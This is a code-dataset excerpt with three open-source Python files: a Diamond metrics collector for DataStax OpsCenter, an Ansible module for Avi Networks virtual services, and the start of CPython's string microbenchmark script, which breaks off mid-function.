repo_name (stringlengths 6-100) | path (stringlengths 4-294) | copies (stringlengths 1-5) | size (stringlengths 4-6) | content (stringlengths 606-896k) | license (stringclasses, 15 values)
---|---|---|---|---|---
russss/Diamond | src/collectors/dseopscenter/dseopscenter.py | 16 | 7115 | # coding=utf-8
"""
Collect the DataStax OpsCenter metrics
"""
import urllib2
import datetime
try:
import json
except ImportError:
import simplejson as json
import diamond.collector
class DseOpsCenterCollector(diamond.collector.Collector):
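# Collector-level state shared across runs: last_run_time marks the end of the
# previous collection window, column_families caches the keyspace.columnfamily
# names fetched from OpsCenter, and last_schema_sync_time records when that
# cache was last refreshed.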
last_run_time = 0
column_families = None
last_schema_sync_time = 0
def get_default_config_help(self):
config_help = super(DseOpsCenterCollector,
self).get_default_config_help()
config_help.update({
'host': "",
'port': "",
'cluster_id': "Set cluster ID/name.\n",
'metrics': "You can list explicit metrics if you like,\n"
" by default all know metrics are included.\n",
'node_group': "Set node group name, any by default\n",
'default_tail_opts': "Chaning these is not recommended.",
})
return config_help
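# For illustration only: a hypothetical Diamond configuration stanza for this
# collector using the options documented above (the host and cluster name are
# placeholders; the exact file location depends on how Diamond is deployed):
#
#   enabled = True
#   host = opscenter.example.com
#   port = 8888
#   cluster_id = MyCluster
#   node_group = *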
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(DseOpsCenterCollector, self).get_default_config()
metrics = [
'cf-bf-false-positives',
'cf-bf-false-ratio',
'cf-bf-space-used',
'cf-keycache-hit-rate',
'cf-keycache-hits',
'cf-keycache-requests',
'cf-live-disk-used',
'cf-live-sstables',
'cf-pending-tasks',
'cf-read-latency-op',
'cf-read-ops',
'cf-rowcache-hit-rate',
'cf-rowcache-hits',
'cf-rowcache-requests',
'cf-total-disk-used',
'cf-write-latency-op',
'cf-write-ops',
'cms-collection-count',
'cms-collection-time',
'data-load',
'heap-committed',
'heap-max',
'heap-used',
'key-cache-hit-rate',
'key-cache-hits',
'key-cache-requests',
'nonheap-committed',
'nonheap-max',
'nonheap-used',
'pending-compaction-tasks',
'pending-flush-sorter-tasks',
'pending-flushes',
'pending-gossip-tasks',
'pending-hinted-handoff',
'pending-internal-responses',
'pending-memtable-post-flushers',
'pending-migrations',
'pending-misc-tasks',
'pending-read-ops',
'pending-read-repair-tasks',
'pending-repair-tasks',
'pending-repl-on-write-tasks',
'pending-request-responses',
'pending-streams',
'pending-write-ops',
'read-latency-op',
'read-ops',
'row-cache-hit-rate',
'row-cache-hits',
'row-cache-requests',
'solr-avg-time-per-req',
'solr-errors',
'solr-requests',
'solr-timeouts',
'total-bytes-compacted',
'total-compactions-completed',
'write-latency-op',
'write-ops',
]
config.update({
'host': '127.0.0.1',
'port': 8888,
'path': 'cassandra',
'node_group': '*',
'metrics': ','.join(metrics),
'default_tail_opts': '&forecast=0&node_aggregation=1',
})
return config
def _get_schema(self):
time_now = int(datetime.datetime.utcnow().strftime('%s'))
if (self.column_families is not None and
(time_now - self.last_schema_sync_time < 3600)):
return False
url = 'http://%s:%i/%s/keyspaces' % (self.config['host'],
int(self.config['port']),
self.config['cluster_id'])
try:
response = urllib2.urlopen(url)
except Exception, err:
self.log.error('%s: %s', url, err)
return False
try:
result = json.load(response)
column_families = []
for ks in result:
i = []
for cf in result[ks]['column_families']:
i.append("%s.%s" % (ks, cf))
column_families.append(i)
self.column_families = ','.join(sum(column_families, []))
self.log.debug('DseOpsCenterCollector columnfamilies = %s',
self.column_families)
self.last_schema_sync_time = time_now
return True
except (TypeError, ValueError):
self.log.error(
"Unable to parse response from opscenter as a json object")
return False
def _get(self, start, end, step=60):
self._get_schema()
url = ('http://%s:%i/%s/new-metrics?node_group=%s&columnfamilies=%s'
'&metrics=%s&start=%i&end=%i&step=%i%s') % (
self.config['host'],
int(self.config['port']),
self.config['cluster_id'],
self.config['node_group'],
self.column_families,
self.config['metrics'],
start, end, step,
self.config['default_tail_opts'])
try:
response = urllib2.urlopen(url)
except Exception, err:
self.log.error('%s: %s', url, err)
return False
self.log.debug('DseOpsCenterCollector metrics url = %s', url)
try:
return json.load(response)
except (TypeError, ValueError):
self.log.error(
"Unable to parse response from opscenter as a json object")
return False
def collect(self):
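"""
Fetch the newest data points from OpsCenter (at most once every 60
seconds) and publish them, joining the metric name with the column
family name where one is reported.
"""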
metrics = {}
if json is None:
self.log.error('Unable to import json')
return None
time_now = int(datetime.datetime.utcnow().strftime('%s'))
self.log.debug('DseOpsCenterCollector last_run_time = %i',
self.last_run_time)
if self.last_run_time == 0:
self.last_run_time = time_now - 60
if time_now - self.last_run_time >= 60:
result = self._get(self.last_run_time, time_now)
self.last_run_time = time_now
if not result:
return None
self.log.debug('DseOpsCenterCollector result = %s', result)
for data in result['data'][self.config['node_group']]:
if data['data-points'][0][0] is not None:
if 'columnfamily' in data:
k = '.'.join([data['metric'],
data['columnfamily']])
metrics[k] = data['data-points'][0][0]
else:
metrics[data['metric']] = data['data-points'][0][0]
self.log.debug('DseOpsCenterCollector metrics = %s', metrics)
for key in metrics:
self.publish(key, metrics[key])
else:
self.log.debug(
"DseOpsCenterCollector can only run once every minute")
return None
| mit |
adityacs/ansible | lib/ansible/modules/network/avi/avi_virtualservice.py | 8 | 20685 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 16.3.8
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'}
DOCUMENTATION = '''
---
module: avi_virtualservice
author: Gaurav Rastogi ([email protected])
short_description: Module for setup of VirtualService Avi RESTful Object
description:
- This module is used to configure the VirtualService object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
active_standby_se_tag:
description:
- This configuration only applies if the virtualservice is in legacy active standby ha mode and load distribution among active standby is enabled.
- This field is used to tag the virtualservice so that virtualservices with the same tag will share the same active serviceengine.
- Virtualservices with different tags will have different active serviceengines.
- If one of the serviceengines in the serviceenginegroup fails, all virtualservices will end up using the same active serviceengine.
- Redistribution of the virtualservices can be either manual or automated when the failed serviceengine recovers.
- Redistribution is based on the auto redistribute property of the serviceenginegroup.
- Default value when not specified in API or module is interpreted by Avi Controller as ACTIVE_STANDBY_SE_1.
analytics_policy:
description:
- Determines analytics settings for the application.
analytics_profile_ref:
description:
- Specifies settings related to analytics.
- It is a reference to an object of type analyticsprofile.
application_profile_ref:
description:
- Enable application layer specific features for the virtual service.
- It is a reference to an object of type applicationprofile.
auto_allocate_floating_ip:
description:
- Auto-allocate floating/elastic ip from the cloud infrastructure.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
auto_allocate_ip:
description:
- Auto-allocate vip from the provided subnet.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
availability_zone:
description:
- Availability-zone to place the virtual service.
avi_allocated_fip:
description:
- (internal-use) fip allocated by avi in the cloud infrastructure.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
avi_allocated_vip:
description:
- (internal-use) vip allocated by avi in the cloud infrastructure.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
client_auth:
description:
- Http authentication configuration for protected resources.
cloud_config_cksum:
description:
- Checksum of cloud configuration for vs.
- Internally set by cloud connector.
cloud_ref:
description:
- It is a reference to an object of type cloud.
cloud_type:
description:
- Cloud_type of virtualservice.
- Default value when not specified in API or module is interpreted by Avi Controller as CLOUD_NONE.
connections_rate_limit:
description:
- Rate limit the incoming connections to this virtual service.
content_rewrite:
description:
- Profile used to match and rewrite strings in request and/or response body.
created_by:
description:
- Creator name.
delay_fairness:
description:
- Select the algorithm for qos fairness.
- This determines how multiple virtual services sharing the same service engines will prioritize traffic over a congested network.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
description:
description:
- User defined description for the object.
discovered_network_ref:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is deprecated.
- It is a reference to an object of type network.
discovered_networks:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is used internally by avi, not editable by the user.
discovered_subnet:
description:
- (internal-use) discovered subnets providing reachability for client facing virtual service ip.
- This field is deprecated.
dns_info:
description:
- Service discovery specific data including fully qualified domain name, type and time-to-live of the dns record.
- Note that only one of fqdn and dns_info setting is allowed.
east_west_placement:
description:
- Force placement on all se's in service group (mesos mode only).
- Default value when not specified in API or module is interpreted by Avi Controller as False.
enable_autogw:
description:
- Response traffic to clients will be sent back to the source mac address of the connection, rather than statically sent to a default gateway.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
enable_rhi:
description:
- Enable route health injection using the bgp config in the vrf context.
enable_rhi_snat:
description:
- Enable route health injection for source nat'ted floating ip address using the bgp config in the vrf context.
enabled:
description:
- Enable or disable the virtual service.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
floating_ip:
description:
- Floating ip to associate with this virtual service.
floating_subnet_uuid:
description:
- If auto_allocate_floating_ip is true and more than one floating-ip subnets exist, then the subnet for the floating ip address allocation.
- This field is applicable only if the virtualservice belongs to an openstack or aws cloud.
- In openstack or aws cloud it is required when auto_allocate_floating_ip is selected.
flow_dist:
description:
- Criteria for flow distribution among ses.
- Default value when not specified in API or module is interpreted by Avi Controller as LOAD_AWARE.
flow_label_type:
description:
- Criteria for flow labelling.
- Default value when not specified in API or module is interpreted by Avi Controller as NO_LABEL.
fqdn:
description:
- Dns resolvable, fully qualified domain name of the virtualservice.
- Only one of 'fqdn' and 'dns_info' configuration is allowed.
host_name_xlate:
description:
- Translate the host name sent to the servers to this value.
- Translate the host name sent from servers back to the value used by the client.
http_policies:
description:
- Http policies applied on the data traffic of the virtual service.
ign_pool_net_reach:
description:
- Ignore pool servers network reachability constraints for virtual service placement.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
ip_address:
description:
- Ip address of the virtual service.
ipam_network_subnet:
description:
- Subnet and/or network for allocating virtualservice ip by ipam provider module.
limit_doser:
description:
- Limit potential dos attackers who exceed max_cps_per_client significantly to a fraction of max_cps_per_client for a while.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
max_cps_per_client:
description:
- Maximum connections per second per client ip.
- Default value when not specified in API or module is interpreted by Avi Controller as 0.
microservice_ref:
description:
- Microservice representing the virtual service.
- It is a reference to an object of type microservice.
name:
description:
- Name for the virtual service.
required: true
network_profile_ref:
description:
- Determines network settings such as protocol, tcp or udp, and related options for the protocol.
- It is a reference to an object of type networkprofile.
network_ref:
description:
- Manually override the network on which the virtual service is placed.
- It is a reference to an object of type network.
network_security_policy_ref:
description:
- Network security policies for the virtual service.
- It is a reference to an object of type networksecuritypolicy.
performance_limits:
description:
- Optional settings that determine performance limits such as max connections or bandwidth.
pool_group_ref:
description:
- The pool group is an object that contains pools.
- It is a reference to an object of type poolgroup.
pool_ref:
description:
- The pool is an object that contains destination servers and related attributes such as load-balancing and persistence.
- It is a reference to an object of type pool.
port_uuid:
description:
- (internal-use) network port assigned to the virtual service ip address.
remove_listening_port_on_vs_down:
description:
- Remove listening port if virtualservice is down.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
requests_rate_limit:
description:
- Rate limit the incoming requests to this virtual service.
scaleout_ecmp:
description:
- Disable re-distribution of flows across service engines for a virtual service.
- Enable if the network itself performs flow hashing with ecmp in environments such as gcp.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
se_group_ref:
description:
- The service engine group to use for this virtual service.
- Moving to a new se group is disruptive to existing connections for this vs.
- It is a reference to an object of type serviceenginegroup.
server_network_profile_ref:
description:
- Determines the network settings profile for the server side of tcp proxied connections.
- Leave blank to use the same settings as the client to vs side of the connection.
- It is a reference to an object of type networkprofile.
service_pool_select:
description:
- Select pool based on destination port.
services:
description:
- List of services defined for this virtual service.
snat_ip:
description:
- Nat'ted floating source ip address(es) for upstream connection to servers.
ssl_key_and_certificate_refs:
description:
- Select or create one or two certificates, ec and/or rsa, that will be presented to ssl/tls terminated connections.
- It is a reference to an object of type sslkeyandcertificate.
ssl_profile_ref:
description:
- Determines the set of ssl versions and ciphers to accept for ssl/tls terminated connections.
- It is a reference to an object of type sslprofile.
ssl_sess_cache_avg_size:
description:
- Expected number of ssl session cache entries (may be exceeded).
- Default value when not specified in API or module is interpreted by Avi Controller as 1024.
static_dns_records:
description:
- List of static dns records applied to this virtual service.
- These are static entries and no health monitoring is performed against the ip addresses.
subnet:
description:
- Subnet providing reachability for client facing virtual service ip.
subnet_uuid:
description:
- It represents the subnet for the virtual service ip address allocation when auto_allocate_ip is true. It is only applicable in openstack or aws cloud.
- This field is required if auto_allocate_ip is true.
tenant_ref:
description:
- It is a reference to an object of type tenant.
type:
description:
- Specify if this is a normal virtual service, or if it is the parent or child of an sni-enabled virtual hosted virtual service.
- Default value when not specified in API or module is interpreted by Avi Controller as VS_TYPE_NORMAL.
url:
description:
- Avi controller URL of the object.
use_bridge_ip_as_vip:
description:
- Use bridge ip as vip on each host in mesos deployments.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
uuid:
description:
- Uuid of the virtualservice.
vh_domain_name:
description:
- The exact name requested from the client's sni-enabled tls hello domain name field.
- If this is a match, the parent vs will forward the connection to this child vs.
vh_parent_vs_uuid:
description:
- Specifies the virtual service acting as virtual hosting (sni) parent.
vrf_context_ref:
description:
- Virtual routing context that the virtual service is bound to.
- This is used to provide the isolation of the set of networks the application is attached to.
- It is a reference to an object of type vrfcontext.
vs_datascripts:
description:
- Datascripts applied on the data traffic of the virtual service.
weight:
description:
- The quality of service weight to assign to traffic transmitted from this virtual service.
- A higher weight will prioritize traffic versus other virtual services sharing the same service engines.
- Default value when not specified in API or module is interpreted by Avi Controller as 1.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create SSL Virtual Service using Pool testpool2
avi_virtualservice:
controller: 10.10.27.90
username: admin
password: AviNetworks123!
name: newtestvs
state: present
performance_limits:
max_concurrent_connections: 1000
services:
- port: 443
enable_ssl: true
- port: 80
ssl_profile_ref: '/api/sslprofile?name=System-Standard'
application_profile_ref: '/api/applicationprofile?name=System-Secure-HTTP'
ssl_key_and_certificate_refs:
- '/api/sslkeyandcertificate?name=System-Default-Cert'
ip_address:
addr: 10.90.131.103
type: V4
pool_ref: '/api/pool?name=testpool2'
'''
RETURN = '''
obj:
description: VirtualService (api/virtualservice) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
active_standby_se_tag=dict(type='str',),
analytics_policy=dict(type='dict',),
analytics_profile_ref=dict(type='str',),
application_profile_ref=dict(type='str',),
auto_allocate_floating_ip=dict(type='bool',),
auto_allocate_ip=dict(type='bool',),
availability_zone=dict(type='str',),
avi_allocated_fip=dict(type='bool',),
avi_allocated_vip=dict(type='bool',),
client_auth=dict(type='dict',),
cloud_config_cksum=dict(type='str',),
cloud_ref=dict(type='str',),
cloud_type=dict(type='str',),
connections_rate_limit=dict(type='dict',),
content_rewrite=dict(type='dict',),
created_by=dict(type='str',),
delay_fairness=dict(type='bool',),
description=dict(type='str',),
discovered_network_ref=dict(type='list',),
discovered_networks=dict(type='list',),
discovered_subnet=dict(type='list',),
dns_info=dict(type='list',),
east_west_placement=dict(type='bool',),
enable_autogw=dict(type='bool',),
enable_rhi=dict(type='bool',),
enable_rhi_snat=dict(type='bool',),
enabled=dict(type='bool',),
floating_ip=dict(type='dict',),
floating_subnet_uuid=dict(type='str',),
flow_dist=dict(type='str',),
flow_label_type=dict(type='str',),
fqdn=dict(type='str',),
host_name_xlate=dict(type='str',),
http_policies=dict(type='list',),
ign_pool_net_reach=dict(type='bool',),
ip_address=dict(type='dict',),
ipam_network_subnet=dict(type='dict',),
limit_doser=dict(type='bool',),
max_cps_per_client=dict(type='int',),
microservice_ref=dict(type='str',),
name=dict(type='str', required=True),
network_profile_ref=dict(type='str',),
network_ref=dict(type='str',),
network_security_policy_ref=dict(type='str',),
performance_limits=dict(type='dict',),
pool_group_ref=dict(type='str',),
pool_ref=dict(type='str',),
port_uuid=dict(type='str',),
remove_listening_port_on_vs_down=dict(type='bool',),
requests_rate_limit=dict(type='dict',),
scaleout_ecmp=dict(type='bool',),
se_group_ref=dict(type='str',),
server_network_profile_ref=dict(type='str',),
service_pool_select=dict(type='list',),
services=dict(type='list',),
snat_ip=dict(type='list',),
ssl_key_and_certificate_refs=dict(type='list',),
ssl_profile_ref=dict(type='str',),
ssl_sess_cache_avg_size=dict(type='int',),
static_dns_records=dict(type='list',),
subnet=dict(type='dict',),
subnet_uuid=dict(type='str',),
tenant_ref=dict(type='str',),
type=dict(type='str',),
url=dict(type='str',),
use_bridge_ip_as_vip=dict(type='bool',),
uuid=dict(type='str',),
vh_domain_name=dict(type='list',),
vh_parent_vs_uuid=dict(type='str',),
vrf_context_ref=dict(type='str',),
vs_datascripts=dict(type='list',),
weight=dict(type='int',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=16.3.5.post1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
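# The shared avi_ansible_api helper (ansible.module_utils.avi) performs the
# actual create/update/delete of the virtualservice object against the Avi
# controller according to the requested 'state'.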
return avi_ansible_api(module, 'virtualservice',
set([]))
if __name__ == '__main__':
main()
| gpl-3.0 |
tpsatish95/Python-Workshop | Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Tools/stringbench/stringbench.py | 51 | 44018 |
# Various microbenchmarks comparing unicode and byte string performance
# Please keep this file both 2.x and 3.x compatible!
import timeit
import itertools
import operator
import re
import sys
import datetime
import optparse
VERSION = '2.0'
def p(*args):
sys.stdout.write(' '.join(str(s) for s in args) + '\n')
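# BYTES and UNICODE turn an ASCII literal into the native byte-string or text
# type for the running interpreter, so every benchmark below can be
# parameterised over both string types.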
if sys.version_info >= (3,):
BYTES = bytes_from_str = lambda x: x.encode('ascii')
UNICODE = unicode_from_str = lambda x: x
else:
BYTES = bytes_from_str = lambda x: x
UNICODE = unicode_from_str = lambda x: x.decode('ascii')
class UnsupportedType(TypeError):
pass
p('stringbench v%s' % VERSION)
p(sys.version)
p(datetime.datetime.now())
REPEAT = 1
REPEAT = 3
#REPEAT = 7
if __name__ != "__main__":
raise SystemExit("Must run as main program")
parser = optparse.OptionParser()
parser.add_option("-R", "--skip-re", dest="skip_re",
action="store_true",
help="skip regular expression tests")
parser.add_option("-8", "--8-bit", dest="bytes_only",
action="store_true",
help="only do 8-bit string benchmarks")
parser.add_option("-u", "--unicode", dest="unicode_only",
action="store_true",
help="only do Unicode string benchmarks")
_RANGE_1000 = list(range(1000))
_RANGE_100 = list(range(100))
_RANGE_10 = list(range(10))
dups = {}
def bench(s, group, repeat_count):
def blah(f):
if f.__name__ in dups:
raise AssertionError("Multiple functions with same name: %r" %
(f.__name__,))
dups[f.__name__] = 1
f.comment = s
f.is_bench = True
f.group = group
f.repeat_count = repeat_count
return f
return blah
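# Illustrative (hypothetical) use of the decorator above -- each benchmark
# receives STR (either BYTES or UNICODE), so the same body is timed once per
# string type:
#
#   @bench('"abc".find("c")', "example group", 1000)
#   def find_example(STR):
#       s = STR("abc")
#       c = STR("c")
#       for x in _RANGE_1000:
#           s.find(c)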
def uses_re(f):
f.uses_re = True
####### 'in' comparisons
@bench('"A" in "A"*1000', "early match, single character", 1000)
def in_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
for x in _RANGE_1000:
s2 in s1
@bench('"B" in "A"*1000', "no match, single character", 1000)
def in_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
for x in _RANGE_1000:
s2 in s1
@bench('"AB" in "AB"*1000', "early match, two characters", 1000)
def in_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
for x in _RANGE_1000:
s2 in s1
@bench('"BC" in "AB"*1000', "no match, two characters", 1000)
def in_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
for x in _RANGE_1000:
s2 in s1
@bench('"BC" in ("AB"*300+"C")', "late match, two characters", 1000)
def in_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
for x in _RANGE_1000:
s2 in s1
@bench('s="ABC"*33; (s+"E") in ((s+"D")*300+s+"E")',
"late match, 100 characters", 100)
def in_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*300 + m+e
s2 = m+e
for x in _RANGE_100:
s2 in s1
# Try with regex
@uses_re
@bench('s="ABC"*33; re.compile(s+"D").search((s+"D")*300+s+"E")',
"late match, 100 characters", 100)
def re_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*300 + m+e
s2 = m+e
pat = re.compile(s2)
search = pat.search
for x in _RANGE_100:
search(s1)
#### same tests as 'in' but use 'find'
@bench('("A"*1000).find("A")', "early match, single character", 1000)
def find_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("A"*1000).find("B")', "no match, single character", 1000)
def find_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*1000).find("AB")', "early match, two characters", 1000)
def find_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*1000).find("BC")', "no match, two characters", 1000)
def find_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*1000).find("CA")', "no match, two characters", 1000)
def find_test_no_match_two_character_bis(STR):
s1 = STR("AB" * 1000)
s2 = STR("CA")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*300+"C").find("BC")', "late match, two characters", 1000)
def find_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('("AB"*300+"CA").find("CA")', "late match, two characters", 1000)
def find_test_slow_match_two_characters_bis(STR):
s1 = STR("AB" * 300+"CA")
s2 = STR("CA")
s1_find = s1.find
for x in _RANGE_1000:
s1_find(s2)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").find(s+"E")',
"late match, 100 characters", 100)
def find_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_find = s1.find
for x in _RANGE_100:
s1_find(s2)
@bench('s="ABC"*33; ((s+"D")*500+"E"+s).find("E"+s)',
"late match, 100 characters", 100)
def find_test_slow_match_100_characters_bis(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + e+m
s2 = e+m
s1_find = s1.find
for x in _RANGE_100:
s1_find(s2)
#### Same tests for 'rfind'
@bench('("A"*1000).rfind("A")', "early match, single character", 1000)
def rfind_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("A"*1000).rfind("B")', "no match, single character", 1000)
def rfind_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("AB"*1000).rfind("AB")', "early match, two characters", 1000)
def rfind_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("AB"*1000).rfind("BC")', "no match, two characters", 1000)
def rfind_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("AB"*1000).rfind("CA")', "no match, two characters", 1000)
def rfind_test_no_match_two_character_bis(STR):
s1 = STR("AB" * 1000)
s2 = STR("CA")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("C"+"AB"*300).rfind("CA")', "late match, two characters", 1000)
def rfind_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('("BC"+"AB"*300).rfind("BC")', "late match, two characters", 1000)
def rfind_test_slow_match_two_characters_bis(STR):
s1 = STR("BC" + "AB" * 300)
s2 = STR("BC")
s1_rfind = s1.rfind
for x in _RANGE_1000:
s1_rfind(s2)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rfind("E"+s)',
"late match, 100 characters", 100)
def rfind_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e+m + (d+m)*500
s2 = e+m
s1_rfind = s1.rfind
for x in _RANGE_100:
s1_rfind(s2)
@bench('s="ABC"*33; (s+"E"+("D"+s)*500).rfind(s+"E")',
"late match, 100 characters", 100)
def rfind_test_slow_match_100_characters_bis(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = m+e + (d+m)*500
s2 = m+e
s1_rfind = s1.rfind
for x in _RANGE_100:
s1_rfind(s2)
#### Now with index.
# Skip the ones which fail because that would include exception overhead.
@bench('("A"*1000).index("A")', "early match, single character", 1000)
def index_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_index = s1.index
for x in _RANGE_1000:
s1_index(s2)
@bench('("AB"*1000).index("AB")', "early match, two characters", 1000)
def index_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_index = s1.index
for x in _RANGE_1000:
s1_index(s2)
@bench('("AB"*300+"C").index("BC")', "late match, two characters", 1000)
def index_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_index = s1.index
for x in _RANGE_1000:
s1_index(s2)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").index(s+"E")',
"late match, 100 characters", 100)
def index_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_index = s1.index
for x in _RANGE_100:
s1_index(s2)
#### Same for rindex
@bench('("A"*1000).rindex("A")', "early match, single character", 1000)
def rindex_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_rindex = s1.rindex
for x in _RANGE_1000:
s1_rindex(s2)
@bench('("AB"*1000).rindex("AB")', "early match, two characters", 1000)
def rindex_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rindex = s1.rindex
for x in _RANGE_1000:
s1_rindex(s2)
@bench('("C"+"AB"*300).rindex("CA")', "late match, two characters", 1000)
def rindex_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rindex = s1.rindex
for x in _RANGE_1000:
s1_rindex(s2)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rindex("E"+s)',
"late match, 100 characters", 100)
def rindex_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e + m + (d+m)*500
s2 = e + m
s1_rindex = s1.rindex
for x in _RANGE_100:
s1_rindex(s2)
#### Same for partition
@bench('("A"*1000).partition("A")', "early match, single character", 1000)
def partition_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("A"*1000).partition("B")', "no match, single character", 1000)
def partition_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("AB"*1000).partition("AB")', "early match, two characters", 1000)
def partition_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("AB"*1000).partition("BC")', "no match, two characters", 1000)
def partition_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('("AB"*300+"C").partition("BC")', "late match, two characters", 1000)
def partition_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_partition = s1.partition
for x in _RANGE_1000:
s1_partition(s2)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").partition(s+"E")',
"late match, 100 characters", 100)
def partition_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_partition = s1.partition
for x in _RANGE_100:
s1_partition(s2)
#### Same for rpartition
@bench('("A"*1000).rpartition("A")', "early match, single character", 1000)
def rpartition_test_quick_match_single_character(STR):
